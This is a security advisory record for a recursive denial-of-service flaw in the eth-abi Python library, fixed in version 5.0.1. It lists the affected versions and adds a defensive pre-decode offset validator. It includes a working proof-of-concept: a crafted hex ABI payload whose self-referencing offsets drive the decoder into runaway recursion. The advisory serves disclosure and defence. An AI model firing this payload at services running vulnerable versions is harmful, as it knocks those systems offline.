GHSA-3qwc-47jf-5rf7

Source
https://github.com/advisories/GHSA-3qwc-47jf-5rf7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-3qwc-47jf-5rf7/GHSA-3qwc-47jf-5rf7.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-3qwc-47jf-5rf7
Published
2024-03-05T14:39:13Z
Modified
2024-12-03T05:48:52.734875Z
Summary
eth-abi is vulnerable to recursive DoS
Details

This is related to the recent ZST advisory (https://github.com/ethereum/eth-abi/security/advisories/GHSA-rqr8-pxh7-cq3g), but it is a different bug: essentially a recursive pointer issue, where offsets in the encoded payload point back at data that is already being decoded instead of advancing past it.

```python
from eth_abi import decode

# Crafted ABI payload: one offset word (0x20), one length word (0x0a = 10),
# then ten element offsets of 0x20 that point back into the head words just
# read, so the decoder keeps re-entering the same region at every level.
payload = "0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020"

# Wrapped in a tuple type this fails fast with
# OverflowError: Python int too large to convert to C ssize_t
#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))

# Padding with zero bytes keeps every read in bounds, so instead of erroring
# out the decoder recurses through the self-referencing offsets (the DoS).
decode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload + ('00' * 1024)))
```
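The fix the advisory records is upgrading to 5.0.1. For callers that must decode untrusted calldata with an older release, or that want a second line of defence, the following is an added example (not eth-abi's own code and not part of the advisory) of a strict pre-decode check: it walks the nested dynamic-array encoding and rejects any element offset that points back into the head region or fails to advance, which is exactly the shape of the payload above. It assumes the base element type is a 32-byte static type such as uint256 and that the outer call decodes a single dynamic argument; the helper names (`validate`, `is_safe_encoding`) and both sample encodings (`VALID`, `LOOPING`) are constructed here, with `LOOPING` reproducing the self-referencing offset pattern at depth two rather than ten.

```python
"""Strict-offset pre-check for ABI-encoded nested dynamic arrays (added example).

Rejects encodings whose tail offsets point back into already-visited head words
before any recursive decode is attempted. Assumes the base type is a 32-byte
static type such as uint256.
"""
from typing import Tuple

WORD = 32


def parse_array_type(type_str: str) -> Tuple[str, int]:
    """Split 'uint256[][]' into ('uint256', 2). Only unsized '[]' suffixes are handled."""
    base, depth = type_str, 0
    while base.endswith("[]"):
        base, depth = base[:-2], depth + 1
    return base, depth


def read_word(data: bytes, pos: int) -> int:
    """Read one big-endian 32-byte word, refusing to read past the buffer."""
    if pos < 0 or pos + WORD > len(data):
        raise ValueError(f"word at {pos} is out of bounds")
    return int.from_bytes(data[pos:pos + WORD], "big")


def check_dynamic_array(data: bytes, pos: int, depth: int) -> None:
    """Validate a T[] encoding starting at `pos`.

    `depth` is the number of '[]' levels remaining (depth 1 means the elements
    are static words). Raises ValueError on the first violation found.
    """
    n = read_word(data, pos)
    heads = pos + WORD                        # first element word (head area start)
    if n > (len(data) - heads) // WORD:       # n heads (or n static words) must fit
        raise ValueError(f"array at {pos} claims {n} elements; buffer too short")
    if depth == 1:
        return                                # static elements: nothing to follow
    prev = -1
    for i in range(n):
        off = read_word(data, heads + WORD * i)   # offset is relative to `heads`
        if off < WORD * n:
            raise ValueError(f"element {i}: offset {off} points into the head region")
        if off <= prev:
            raise ValueError(f"element {i}: offset {off} is not strictly increasing")
        prev = off
        check_dynamic_array(data, heads + off, depth - 1)


def validate(type_str: str, data: bytes) -> None:
    """Strict pre-check for decode([type_str], data) with one dynamic argument."""
    _, depth = parse_array_type(type_str)
    if depth == 0:
        raise ValueError("not a dynamic array type")
    off = read_word(data, 0)                  # head word of the single argument
    if off < WORD:
        raise ValueError(f"top-level offset {off} points into the head")
    check_dynamic_array(data, off, depth)


def is_safe_encoding(type_str: str, data: bytes) -> bool:
    """True when the encoding passes the strict offset rules, False otherwise."""
    try:
        validate(type_str, data)
        return True
    except ValueError:
        return False


def _w(x: int) -> bytes:
    return x.to_bytes(WORD, "big")


# Constructed samples. VALID encodes uint256[][] = [[1, 2], [3]]. LOOPING follows the
# advisory's pattern: three element offsets of 0x20 that point back into the heads,
# padded with zero bytes so every read stays in bounds.
VALID = b"".join(_w(v) for v in (0x20, 2, 0x40, 0xA0, 2, 1, 2, 1, 3))
LOOPING = b"".join(_w(v) for v in (0x20, 3, 0x20, 0x20, 0x20)) + b"\x00" * (8 * WORD)

if __name__ == "__main__":
    print("valid:", is_safe_encoding("uint256[][]", VALID))      # True
    print("looping:", is_safe_encoding("uint256[][]", LOOPING))  # False
```

Because every accepted offset must land past the current head area and strictly after the previous sibling's offset, each recursion step moves forward through the buffer, so the total work is bounded by the input length and the nesting depth of the type string rather than by what the payload's own pointers say.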
Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-05T14:39:13Z"
}
References

Affected packages

PyPI / eth-abi

Affected ranges
Type: ECOSYSTEM
Events:
Introduced: 0 (unknown introduced version; all previous versions are affected)
Fixed: 5.0.1

Affected versions

0.*

0.5.0

1.*

1.0.0b0
1.0.0b1
1.0.0
1.1.0
1.1.1
1.2.0
1.2.1
1.2.2
1.3.0

2.*

2.0.0a1
2.0.0b0
2.0.0b1
2.0.0b2
2.0.0b3
2.0.0b4
2.0.0b5
2.0.0b6
2.0.0b7
2.0.0b8
2.0.0b9
2.0.0
2.1.0
2.1.1
2.2.0

3.*

3.0.0
3.0.1

4.*

4.0.0b1
4.0.0b2
4.0.0b3
4.0.0
4.1.0
4.2.0
4.2.1

5.*

5.0.0

Database specific

{
    "last_known_affected_version_range": "<= 5.0.0"
}